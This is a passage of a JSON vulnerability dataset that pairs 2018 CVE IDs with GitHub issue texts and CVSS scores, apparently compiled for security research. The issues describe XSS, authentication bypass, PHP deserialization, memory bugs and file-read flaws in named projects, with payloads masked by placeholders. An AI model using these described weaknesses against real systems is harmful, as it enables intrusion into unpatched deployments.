  16636. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  16637. "severity": "CRITICAL",
  16638. "baseScore": 9.1,
  16639. "impactScore": 5.2,
  16640. "exploitabilityScore": 3.9
  16641. },
  16642. {
  16643. "CVE_ID": "CVE-2018-1000139",
  16644. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/119",
  16645. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/119",
  16646. "Repo_new": "mkucej/i-librarian",
  16647. "Issue_Created_At": "2018-03-15T09:38:05Z",
  16648. "description": "Reflected XSS vulnerability. URLTAG When APITAG at ilibrarian APITAG could cause a reflective XSS. POC: URLTAG APITAG APITAG",
  16649. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16650. "severity": "MEDIUM",
  16651. "baseScore": 6.1,
  16652. "impactScore": 2.7,
  16653. "exploitabilityScore": 2.8
  16654. },
  16655. {
  16656. "CVE_ID": "CVE-2018-1000141",
  16657. "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/124",
  16658. "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/124",
  16659. "Repo_new": "mkucej/i-librarian",
  16660. "Issue_Created_At": "2018-03-23T05:52:03Z",
  16661. "description": "Unauthorized read, post and delete messages in arbitrary projects. For example, if user1 creates a project and invites some users into this project. User2 is not in this project. If user2 visits APITAG directly, he gets ERRORTAG You are not authorized to see this project.\" But if user2 visits APITAG , he is able to read the messages for this project. Similarly user2 can use APITAG to delete all messages, and APITAG to post new messages. The bug is in FILETAG . Unlike FILETAG , FILETAG doesn't check if the current user is in the specified project.",
  16662. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  16663. "severity": "CRITICAL",
  16664. "baseScore": 9.1,
  16665. "impactScore": 5.2,
  16666. "exploitabilityScore": 3.9
  16667. },
  16668. {
  16669. "CVE_ID": "CVE-2018-1000154",
  16670. "Issue_Url_old": "https://github.com/zammad/zammad/issues/1869",
  16671. "Issue_Url_new": "https://github.com/zammad/zammad/issues/1869",
  16672. "Repo_new": "zammad/zammad",
  16673. "Issue_Created_At": "2018-03-12T07:01:16Z",
  16674. "description": "XSS issue placeholder. Infos: Used Zammad version NUMBERTAG and higher Installation method (source, package, ..): any Operating system: any Database + version: any Elasticsearch version: any Browser + version: any MENTIONTAG ( URLTAG reported and XSS issue. The content of this issue will be public after the issue is solved. Expected behavior: placeholder The content will be public after the issue is solved. Actual behavior: placeholder The content will be public after the issue is solved. Steps to reproduce the behavior: placeholder The content will be public after the issue is solved.",
  16675. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16676. "severity": "MEDIUM",
  16677. "baseScore": 6.1,
  16678. "impactScore": 2.7,
  16679. "exploitabilityScore": 2.8
  16680. },
  16681. {
  16682. "CVE_ID": "CVE-2018-1000160",
  16683. "Issue_Url_old": "https://github.com/RisingStack/protect/issues/16",
  16684. "Issue_Url_new": "https://github.com/risingstack/protect/issues/16",
  16685. "Repo_new": "risingstack/protect",
  16686. "Issue_Created_At": "2018-03-26T23:43:53Z",
  16687. "description": "Vulnerable to XSS attacs. tl;dr Don't use regex's for sanitization of HTML but if you are, then at least strip out all tags with something like: APITAG But with even this, I'd imagine a carefully constructed XSS vector could get around it I'd advise: Escaping the characters using HTML entities e.g. ERRORTAG Using a nodes text APITAG isn't an option for server side code) e.g. ERRORTAG APITAG As discussed in many posts e.g. URLTAG URLTAG Regular expressions are not a valid approach when dealing with a more complicated language(especially when browsers support _dirty_ HTML) For example, here are NUMBERTAG alid XSS attack vectors that are all reported as false Attack Vectors ERRORTAG These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute. The results can be seen here: URLTAG I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet. If you insist on using regex, here's a good list + just remove any tag FILETAG",
  16688. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16689. "severity": "MEDIUM",
  16690. "baseScore": 6.1,
  16691. "impactScore": 2.7,
  16692. "exploitabilityScore": 2.8
  16693. },
  16694. {
  16695. "CVE_ID": "CVE-2018-1000162",
  16696. "Issue_Url_old": "https://github.com/Roave/SecurityAdvisories/issues/44",
  16697. "Issue_Url_new": "https://github.com/roave/securityadvisories/issues/44",
  16698. "Repo_new": "roave/securityadvisories",
  16699. "Issue_Created_At": "2018-02-26T17:52:30Z",
  16700. "description": "Parsedown status is questionable?. Parsedown is listed here as having a security advisory, but I'm not NUMBERTAG sure it is warranted. It is a Markdown parsing library that takes the Markdown input it is given and turns it into HTML. Period. That is all it does. It is not output sanitizer and the author has stated that that is not a goal of the library. It already is possible to combine Parsedown with a sanitizer in order to sanitize output, for example: CODETAG IMO, these two things are separate concerns and forcing Parsedown to implement a full HTML sanitization feature or integrate with other libraries to do so when it can easily be done flexibly and easily in user land doesn't make a ton of sense. Thoughts?",
  16701. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16702. "severity": "MEDIUM",
  16703. "baseScore": 6.1,
  16704. "impactScore": 2.7,
  16705. "exploitabilityScore": 2.8
  16706. },
  16707. {
  16708. "CVE_ID": "CVE-2018-1000164",
  16709. "Issue_Url_old": "https://github.com/benoitc/gunicorn/issues/1227",
  16710. "Issue_Url_new": "https://github.com/benoitc/gunicorn/issues/1227",
  16711. "Repo_new": "benoitc/gunicorn",
  16712. "Issue_Created_At": "2016-03-17T13:40:41Z",
  16713. "description": "Potential HTTP Response Splitting Vulnerability. This FILETAG was recently reported to and fixed in both waitress (WSGI server) URLTAG and APITAG URLTAG (and waitress has an outstanding issues URLTAG to discuss further possible vulnerabilities). I also made changes to gevent URLTAG for these issues. gunicorn seems to be partly (but not entirely) vulnerable to these issues as well, across at least the sync and gevent workers. Here are three apps, each producing different kinds of bad output. The badvalue case (invalid values in the header values) is probably the most likely injection vulnerability, with the next being the badname case (invalid value in the header names) and the least likely being the badstatus case (invalid value in the status line): CODETAG Here's what happens hitting badvalue . We get a bunch of duplicate headers that might confuse clients: ERRORTAG Here's what happens hitting badname . The worst I was able to do was produce malformed HTTP; on other servers I was able to cause clients to hang, but I haven't reproduced that with gunicorn (yet): ERRORTAG Finally, here's badstatus . Here, we completely override the rest of the response: APITAG Should gunicorn check for and raise exceptions for these type of malformed values in APITAG ?",
  16714. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16715. "severity": "HIGH",
  16716. "baseScore": 7.5,
  16717. "impactScore": 3.6,
  16718. "exploitabilityScore": 3.9
  16719. },
  16720. {
  16721. "CVE_ID": "CVE-2018-1000211",
  16722. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
  16723. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/891",
  16724. "Repo_new": "doorkeeper-gem/doorkeeper",
  16725. "Issue_Created_At": "2016-10-05T13:00:29Z",
  16726. "description": "Revoking token does not work for public clients. Hello, I'm using grant implicit to allow authorizing an application from mobile applications: APITAG After a successful oauth flow, the generated token is saved in the APITAG table jointly with the application referenced by the original APITAG request: CODETAG The APITAG is empty, as expected since using implicit . When I try to revoke this token using the POST /oauth/revoke API endpoint URLTAG (the one at the bottom, which does not require APITAG or APITAG to be passed), it does not get revoked. Diving into the source code, I see in the APITAG : ERRORTAG However, as per above the token _does_ specify the APITAG , despite having used the implicit grant type. Hence, when I try to revoke this token I land in the controller's authorized? method URLTAG : ERRORTAG Where APITAG is nil , hence authorized? returns false and the token does not get revoked. Is this expected behavior?",
  16727. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16728. "severity": "HIGH",
  16729. "baseScore": 7.5,
  16730. "impactScore": 3.6,
  16731. "exploitabilityScore": 3.9
  16732. },
  16733. {
  16734. "CVE_ID": "CVE-2018-1000216",
  16735. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/241",
  16736. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/241",
  16737. "Repo_new": "davegamble/cjson",
  16738. "Issue_Created_At": "2018-02-07T07:51:36Z",
  16739. "description": "Memory issues when printing APITAG I was taking a look at the cJSON codebase on behalf of a customer, and I noticed a couple of things that I wanted to check when printing APITAG values: If item >valuestring is NULL, the APITAG implementation may deallocate the write buffer and then return URLTAG . However, at least some callers of APITAG (for example APITAG will also deallocate this buffer on failure. This looks like a potential double free. If item >valuestring is not NULL, APITAG ensures the buffer is long enough to receive it and then memcpys the string length into the buffer URLTAG . This means the buffer is not NULL terminated. As it happens, if realloc is not available and APITAG was the caller of APITAG then it will null terminate the buffer \" just to be sure URLTAG \". But in any other case I think this string will not be null terminated, unless the malloced memory happened to be zero. I haven't had time to be verify this for certain, or write tests, but I thought I would report it while I had it in front of me.",
  16740. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16741. "severity": "HIGH",
  16742. "baseScore": 8.8,
  16743. "impactScore": 5.9,
  16744. "exploitabilityScore": 2.8
  16745. },
  16746. {
  16747. "CVE_ID": "CVE-2018-1000217",
  16748. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/248",
  16749. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/248",
  16750. "Repo_new": "davegamble/cjson",
  16751. "Issue_Created_At": "2018-03-01T18:15:13Z",
  16752. "description": "String deallocated before use. Maybe I'm doing things in a dumb way, but given the method I'm using, there's a problem with the function APITAG What I want to do is to parse a number of separate .json files and merge their contents into a single cJSON object. The files may partially duplicate each other. Objects and array items that are already in the result that is being constructed should be skipped during the processing of a .json file, i.e. no duplicate objects or array elements are permitted in the result output. So, at the top level each file contains one object (always with the same name, \"stuff\" in the simplified examples below), which in turn contains other objects, which contain arrays of objects. A simple example will illustrate what I want to achieve. .json file NUMBERTAG CODETAG .json file NUMBERTAG CODETAG I want the result of the merge operation to be a cJSON object that represents the following .json: CODETAG First, I use APITAG to start my result object. Then I process each .json file in turn, using APITAG to create a cJSON object that represents the file. Then this cJSON object is examined, and if any \"stuff\" is found, it is moved to the result object, except such objects/array elements as are already present there. Here is a code snippet that shows how I handle the merge operation for an object at the level directly under \"stuff\" that is not yet present at all in the result: CODETAG APITAG is a cJSON object from the current .json file, representing for example \"BAZ\" from the .json files above. I want to move that object from the cJSON object representing the .json file APITAG to the cJSON result object under construction APITAG The problem is that the internal function APITAG in cJSON assumes that its _string_ argument is valid throughout the function. But when I use APITAG >string_, that assumption becomes false, because that string is deallocated before a copy is made and inserted in the item before it's added to the target object. The result (at best) is that the item string will contain garbage. Perhaps the order of actions in APITAG could be rearranged, so that a copy of the _string_ argument is made before any deallocations? Of course, I could allocate memory and make a copy of the string in my own code, but that seems a bit silly. Maybe my method is naive, and a there is a better way of doing what I want that does not run into this kind of problem? If so, please let me know. I'm relatively new to cJSON.",
  16753. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16754. "severity": "CRITICAL",
  16755. "baseScore": 9.8,
  16756. "impactScore": 5.9,
  16757. "exploitabilityScore": 3.9
  16758. },
  16759. {
  16760. "CVE_ID": "CVE-2018-1000218",
  16761. "Issue_Url_old": "https://github.com/openemr/openemr/issues/1781",
  16762. "Issue_Url_new": "https://github.com/openemr/openemr/issues/1781",
  16763. "Repo_new": "openemr/openemr",
  16764. "Issue_Created_At": "2018-07-25T15:32:47Z",
  16765. "description": "APITAG NUMBERTAG Cross Site Scripting in PATHTAG I found an application security issue in PATHTAG of APITAG NUMBERTAG and likely earlier versions. The vulnerability exists due to a lack of sanitation of user supplied input. The vulnerability allows attackers to execute javascript on remotely authenticated users via the 'file' and 'scan' parameters. Proof of Concept URL 'file' parameter: URLTAG Proof of Concept URL 'scan' parameter: URLTAG",
  16766. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  16767. "severity": "MEDIUM",
  16768. "baseScore": 5.4,
  16769. "impactScore": 2.7,
  16770. "exploitabilityScore": 2.3
  16771. },
  16772. {
  16773. "CVE_ID": "CVE-2018-1000222",
  16774. "Issue_Url_old": "https://github.com/libgd/libgd/issues/447",
  16775. "Issue_Url_new": "https://github.com/libgd/libgd/issues/447",
  16776. "Repo_new": "libgd/libgd",
  16777. "Issue_Created_At": "2018-07-14T17:12:59Z",
  16778. "description": "APITAG possible double free bug . Possible double free bug same as CVETAG exists for ` function. CODETAG MENTIONTAG",
  16779. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16780. "severity": "HIGH",
  16781. "baseScore": 8.8,
  16782. "impactScore": 5.9,
  16783. "exploitabilityScore": 2.8
  16784. },
  16785. {
  16786. "CVE_ID": "CVE-2018-1000224",
  16787. "Issue_Url_old": "https://github.com/godotengine/godot/issues/20558",
  16788. "Issue_Url_new": "https://github.com/godotengine/godot/issues/20558",
  16789. "Repo_new": "godotengine/godot",
  16790. "Issue_Created_At": "2018-07-29T01:55:55Z",
  16791. "description": "Godot serialization security issues. Godot version: Any version of Godot since I could trace NUMBERTAG when it was open sourced) OS/device including version: Any Issue description: Few weeks ago, I noticed by chance that passing a specific array of bytes to APITAG PATHTAG class gdscript bytes2var crashed the engine. (in NUMBERTAG APITAG ). After further investigations I realised that the (de)serialization code hadn't seen love in a while, so I went for a full audit and found out there were actually a few more issues. The main issues where: Crash due to unbound allocation : Array types sometimes didn't have the right size check (due to incorrenct signed/unsigned comparison), causing the engine to try to allocate huge ammount of memory and being terminated by the OS. Read buffer overflow : Some types had incorrect size checks potentially causing buffer overflow during reading. Leak of memory content : Some strings padding where not correctly zeroized, potentially causing freed but not cleared internal memory disclosure over network (although be reassured by the fact that crypto libs like APITAG and APITAG does clear their memory when freeing things like private key and so on). I decided to privately contact few other developers ( MENTIONTAG MENTIONTAG MENTIONTAG APITAG and we agreed to embargo this issue while we worked on a fix. If you are reading this, patches are are already available (so this issue is actually closed), and updated binaries are available for download at the official Godot website URLTAG . Steps to reproduce: Run a script that executes NUMBERTAG APITAG Minimal reproduction project: Please see this testing project URLTAG I made to perform automatic tests. Afterwords First, I would like to thank all the devs involved, who helped me a lot during the development of the fix, and stayed online on weekends to do the releases. In my humble opinion, this incident, along with the history of this engine, clearly shows how source code availability and great communities like this one, can improve software quality with concrete benefits to everyone. From a security prospective, responsible disclosure is, in my opinion, the best road to security. In this sense, in the coming month we will be working on setting up guidelines and procedures in case anyone discovers a new security issue. In the meantime, I invite everyone with a passion in security, to try and break our engine, the network code, the serialization process. If you find anything, let us know here on Github or on IRC at godotengine devel , we won't sue you, we will actually thank you :heart:",
  16792. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16793. "severity": "HIGH",
  16794. "baseScore": 7.5,
  16795. "impactScore": 3.6,
  16796. "exploitabilityScore": 3.9
  16797. },
  16798. {
  16799. "CVE_ID": "CVE-2018-1000225",
  16800. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1917",
  16801. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1917",
  16802. "Repo_new": "cobbler/cobbler",
  16803. "Issue_Created_At": "2018-08-02T14:57:32Z",
  16804. "description": "Persistent XSS vulnerability in cobbler web. cobbler web renders HTML and executes APITAG payloads that are provided by users. Combined with authentication problems in the Cobbler XMLRPC API URLTAG , this allows unauthenticated users to inject malicious payloads into the web UI. A harmless Proof of Concept script: ERRORTAG Then when you visit the APITAG endpoint: FILETAG These payloads can be used to hijack the sessions of administrator and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information. cobbler web should sanitize all user provided inputs, and treat them as untrusted. This included never rendering user provided HTML, nor executing user provided APITAG See this post URLTAG for more discussion.",
  16805. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16806. "severity": "MEDIUM",
  16807. "baseScore": 6.1,
  16808. "impactScore": 2.7,
  16809. "exploitabilityScore": 2.8
  16810. },
  16811. {
  16812. "CVE_ID": "CVE-2018-1000226",
  16813. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1916",
  16814. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1916",
  16815. "Repo_new": "cobbler/cobbler",
  16816. "Issue_Created_At": "2018-08-02T14:55:55Z",
  16817. "description": "Many XMLRPC API endpoints are not correctly validating security tokens. Looking at Cobbler's XMLRPC API, there are many places where the user supplied security token is not being correctly validated, effectively resulting in authentication being bypassed. Using some quick and dirty FILETAG , I discovered that there are no fewer than NUMBERTAG other endpoints that require an security token but don't actually use it! This means that unauthenticated users are able to perform all sorts of actions that they should not be able to. Example For example, the APITAG endpoint allows users to upload files to the server. As this is a dangerous action, there is a flag in APITAG that must be explicitly enabled before this functionality becomes available: From APITAG URLTAG : yaml NOTE: This does allow an xmlrpc call to send logs to this directory, without authentication, so enable only if you are ok with this limitation. anamon_enabled NUMBERTAG However, authenticated users can also change this setting in a running server using the APITAG endpoint in the XMLRPC API. APITAG But the actual implementation of the endpoint never validates the value of the token parameter, so any value works: CODETAG So it doesn't matter whether the server operator is \"ok with this limitation\", since unauthenticated users can change the value at any time. Conclusion There are many other potentially harmful endpoints in the API, and many more creative ways to exploit them. The Cobbler XMLRPC API needs to be carefully examined with security in mind to make sure that all of the API endpoints are validating their security tokens correctly. In the meantime, consider using a firewall to restrict/disable access to the APITAG endpoint. See this post URLTAG for more discussion.",
  16818. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16819. "severity": "CRITICAL",
  16820. "baseScore": 9.8,
  16821. "impactScore": 5.9,
  16822. "exploitabilityScore": 3.9
  16823. },
  16824. {
  16825. "CVE_ID": "CVE-2018-1000520",
  16826. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/1561",
  16827. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/1561",
  16828. "Repo_new": "mbed-tls/mbedtls",
  16829. "Issue_Created_At": "2018-04-06T09:11:15Z",
  16830. "description": "TLS ECDH RSA Ciphersuites Allow ECDSA Signed Certificates. Description Type: Bug Bug mbed TLS build: Version NUMBERTAG I assume it's also present in the newest build, as well as the previous ones) When the negotiated ciphersuite is of the type TLS ECDH RSA (ECDH key exchange + RSA signed certificate), ECDSA signed certificates are accepted, which means that the ciphersuite technically becomes TLS ECDH ECDSA. FILETAG states that in an ECDH_RSA key exchange, the certificate MUST be signed with RSA. Proof Of Concept Due to lack of time, I don't have time to submit a \"pretty\" POF, but here goes a sample client and server program. The client and the server accept a single argument: the id of the ciphersuite to use. You can use APITAG ( APITAG ), for example. Here are the sources: FILETAG FILETAG Simply compile both (if you place them in the APITAG directory and add the executables in APITAG it should work fine NUMBERTAG Compile NUMBERTAG Run APITAG NUMBERTAG Run APITAG NUMBERTAG Confirm that the connection is successful. Note that the server is using the certificate (it's printed out to the console): CODETAG which is signed with APITAG",
  16831. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16832. "severity": "HIGH",
  16833. "baseScore": 7.5,
  16834. "impactScore": 3.6,
  16835. "exploitabilityScore": 3.9
  16836. },
  16837. {
  16838. "CVE_ID": "CVE-2018-1000523",
  16839. "Issue_Url_old": "https://github.com/bram85/topydo/issues/240",
  16840. "Issue_Url_new": "https://github.com/topydo/topydo/issues/240",
  16841. "Repo_new": "topydo/topydo",
  16842. "Issue_Created_At": "2018-05-13T03:44:39Z",
  16843. "description": "Unexpected behaviour of topydo when tasks contain backslashes. topydo passes TODO texts as the repl argument of APITAG unchanged at PATHTAG If an issue contains a backslash, it is thus interpreted as an escape: an issue containing APITAG will output only foo . This can also lead to crashing topydo : APITAG will trigger a crash This, finally, also means that the TODO task can output whatever bytes it wants to the terminal without any check from topydo, thus potentially opening way to exploiting a flaw in the terminal's escape code handling from an untrusted FILETAG files (eg. automatically generated from untrusted sources, like code). (the attack path here looks rather narrow to me, though): APITAG outputs APITAG APITAG makes bar blink APITAG erases the previous TODO on the list (in topydo ls output) and replaces it by \u201cyou didn't see this\u201d etc.",
  16844. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  16845. "severity": "HIGH",
  16846. "baseScore": 8.1,
  16847. "impactScore": 5.2,
  16848. "exploitabilityScore": 2.8
  16849. },
  16850. {
  16851. "CVE_ID": "CVE-2018-1000525",
  16852. "Issue_Url_old": "https://github.com/flack/openpsa/issues/191",
  16853. "Issue_Url_new": "https://github.com/flack/openpsa/issues/191",
  16854. "Repo_new": "flack/openpsa",
  16855. "Issue_Created_At": "2018-05-29T13:28:00Z",
  16856. "description": "PHP Object Deserialization. Issue An attacker can perform PHP object serialization attacks, which can possibly lead to remote code execution. Vulnerable Section URLTAG The code above displays that base NUMBERTAG encoded GET arguments are unserialized without being sanitised, which causes PHP object serialization attacks.",
  16857. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16858. "severity": "CRITICAL",
  16859. "baseScore": 9.8,
  16860. "impactScore": 5.9,
  16861. "exploitabilityScore": 3.9
  16862. },
  16863. {
  16864. "CVE_ID": "CVE-2018-1000526",
  16865. "Issue_Url_old": "https://github.com/flack/openpsa/issues/192",
  16866. "Issue_Url_new": "https://github.com/flack/openpsa/issues/192",
  16867. "Repo_new": "flack/openpsa",
  16868. "Issue_Created_At": "2018-05-29T13:47:14Z",
  16869. "description": "XML APITAG Attack. The Issue A specially crafted XML file can be used to create a denial of service scenario within the openpsa admin portal. Vulnerable Code URLTAG The above code displays that an XML file is being parsed. URLTAG The code above displays that the XML file is user controlled. This can allow an attacker to create a denial of service scenario for all versions of PHP prior to NUMBERTAG Minimum PHP requirements for openpsa project: URLTAG CVE for vulnerable PHP function: URLTAG",
  16870. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  16871. "severity": "HIGH",
  16872. "baseScore": 7.5,
  16873. "impactScore": 3.6,
  16874. "exploitabilityScore": 3.9
  16875. },
  16876. {
  16877. "CVE_ID": "CVE-2018-1000527",
  16878. "Issue_Url_old": "https://github.com/Froxlor/Froxlor/issues/555",
  16879. "Issue_Url_new": "https://github.com/froxlor/froxlor/issues/555",
  16880. "Repo_new": "froxlor/froxlor",
  16881. "Issue_Created_At": "2018-05-29T12:56:06Z",
  16882. "description": "PHP Object Serialisation Bug. Summary An attacker with administrative privileges can perform PHP object serialisation attacks, which can possibly lead to remote code execution. System information Froxlor version NUMBERTAG Web server: apache2 DNS server: Bind POP/IMAP server: Courier SMTP server: postfix FTP server: proftpd APITAG Ubuntu Vulnerable Section URLTAG An administrator user can create a new domain and use the code above to deserialise a PHP object, running it's magic methods to execute PHP commands on the server. This may lead to remote code execution",
  16883. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  16884. "severity": "HIGH",
  16885. "baseScore": 7.2,
  16886. "impactScore": 5.9,
  16887. "exploitabilityScore": 1.2
  16888. },
  16889. {
  16890. "CVE_ID": "CVE-2018-1000528",
  16891. "Issue_Url_old": "https://github.com/gosa-project/gosa-core/issues/14",
  16892. "Issue_Url_new": "https://github.com/gosa-project/gosa-core/issues/14",
  16893. "Repo_new": "gosa-project/gosa-core",
  16894. "Issue_Created_At": "2018-05-23T12:03:11Z",
  16895. "description": "Server Side Reflected XSS via POST to FILETAG . APITAG here as requested by Gonicus) The FILETAG endpoint fails to sanitize the uid POST parameter, leading to a Server Side Reflected XSS vulnerability as this parameter is later assigned to a Smarty variable of the same name and then rendered in the context of an HTML attribute in APITAG . As a result, arbitrary APITAG can be executed in the GOSA origin. This vulnerability is very similar to the one reported as CVETAG URLTAG , but uses a different endpoint. Suggested fix (untested): Use APITAG to escape the value of uid before assigning it to the Smarty variable here URLTAG .",
  16896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16897. "severity": "MEDIUM",
  16898. "baseScore": 6.1,
  16899. "impactScore": 2.7,
  16900. "exploitabilityScore": 2.8
  16901. },
  16902. {
  16903. "CVE_ID": "CVE-2018-1000529",
  16904. "Issue_Url_old": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
  16905. "Issue_Url_new": "https://github.com/grails-fields-plugin/grails-fields/issues/278",
  16906. "Repo_new": "grails-fields-plugin/grails-fields",
  16907. "Issue_Created_At": "2018-05-24T12:04:00Z",
  16908. "description": "XSS vulnerability when rendering f:display for beans . From MENTIONTAG We've received a XSS vulnerability report that it's caused by the Fields plugin. It's pretty easy to reproduce the issue (the user also provided a sample project), just a domain class with a String property with the value APITAG . Then using the default scaffolding the alert is displayed in both list and show pages.",
  16909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16910. "severity": "MEDIUM",
  16911. "baseScore": 6.1,
  16912. "impactScore": 2.7,
  16913. "exploitabilityScore": 2.8
  16914. },
  16915. {
  16916. "CVE_ID": "CVE-2018-1000531",
  16917. "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/3",
  16918. "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/3",
  16919. "Repo_new": "fusionauth/fusionauth-jwt",
  16920. "Issue_Created_At": "2018-05-02T13:11:59Z",
  16921. "description": "JWT signature validation can be bypassed in versions NUMBERTAG Summary The prime jwt implementation allows that any not signed JWT be decoded and, therefore, validated by APITAG class, even when a Verifier object is provided. This issue affects versions NUMBERTAG For security reasons, I'm contacting the developers by email with the necessary technical details. Description When the APITAG APITAG is called, the JWT signature will be ignored due to a lack of validation in APITAG A new condition should be added in this class to prevent that any APITAG without the signature part be decoded if exists at least NUMBERTAG erifier_ object.",
  16922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  16923. "severity": "HIGH",
  16924. "baseScore": 7.5,
  16925. "impactScore": 3.6,
  16926. "exploitabilityScore": 3.9
  16927. },
  16928. {
  16929. "CVE_ID": "CVE-2018-1000532",
  16930. "Issue_Url_old": "https://github.com/johnath/beep/issues/11",
  16931. "Issue_Url_new": "https://github.com/johnath/beep/issues/11",
  16932. "Repo_new": "johnath/beep",
  16933. "Issue_Created_At": "2018-04-03T11:34:26Z",
  16934. "description": "CVETAG . Just a short heads up: CVETAG",
  16935. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  16936. "severity": "MEDIUM",
  16937. "baseScore": 4.7,
  16938. "impactScore": 3.6,
  16939. "exploitabilityScore": 1.0
  16940. },
  16941. {
  16942. "CVE_ID": "CVE-2018-1000534",
  16943. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/500",
  16944. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/500",
  16945. "Repo_new": "laurent22/joplin",
  16946. "Issue_Created_At": "2018-05-08T11:54:40Z",
  16947. "description": "Vulnerability report please contact. I would like to report a vulnerability. Could you please contact me on EMAILTAG as I did not manage to find any e mail from your repo to contact you. Best, Silvia",
  16948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16949. "severity": "MEDIUM",
  16950. "baseScore": 6.1,
  16951. "impactScore": 2.7,
  16952. "exploitabilityScore": 2.8
  16953. },
  16954. {
  16955. "CVE_ID": "CVE-2018-1000535",
  16956. "Issue_Url_old": "https://github.com/lmsgit/lms/issues/1271",
  16957. "Issue_Url_new": "https://github.com/chilek/lms/issues/1271",
  16958. "Repo_new": "chilek/lms",
  16959. "Issue_Created_At": "2018-05-29T14:29:46Z",
  16960. "description": "Arbitrary File Read. The Issue An attacker can arbitrarily read files (which the user running the web application has permission to read) using unsanitised user input passed to the fopen PHP function Where the Issue Occured An attacker can control the file path for reading a file using the variable assignment below: URLTAG The above variable is passed to the line below, where the fopen function is being used to read the file: URLTAG As displayed above, APITAG is appended to the file name, however this can be bypassed (in some versions of PHP) using a null byte terminator NUMBERTAG",
  16961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  16962. "severity": "HIGH",
  16963. "baseScore": 7.5,
  16964. "impactScore": 3.6,
  16965. "exploitabilityScore": 3.9
  16966. },
  16967. {
  16968. "CVE_ID": "CVE-2018-1000536",
  16969. "Issue_Url_old": "https://github.com/luin/medis/issues/109",
  16970. "Issue_Url_new": "https://github.com/luin/medis/issues/109",
  16971. "Repo_new": "luin/medis",
  16972. "Issue_Created_At": "2017-12-01T09:42:45Z",
  16973. "description": "XSS to code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
  16974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16975. "severity": "MEDIUM",
  16976. "baseScore": 6.1,
  16977. "impactScore": 2.7,
  16978. "exploitabilityScore": 2.8
  16979. },
  16980. {
  16981. "CVE_ID": "CVE-2018-1000540",
  16982. "Issue_Url_old": "https://github.com/oswetto/LoboEvolution/issues/38",
  16983. "Issue_Url_new": "https://github.com/loboevolution/loboevolution/issues/38",
  16984. "Repo_new": "loboevolution/loboevolution",
  16985. "Issue_Created_At": "2018-04-23T09:28:34Z",
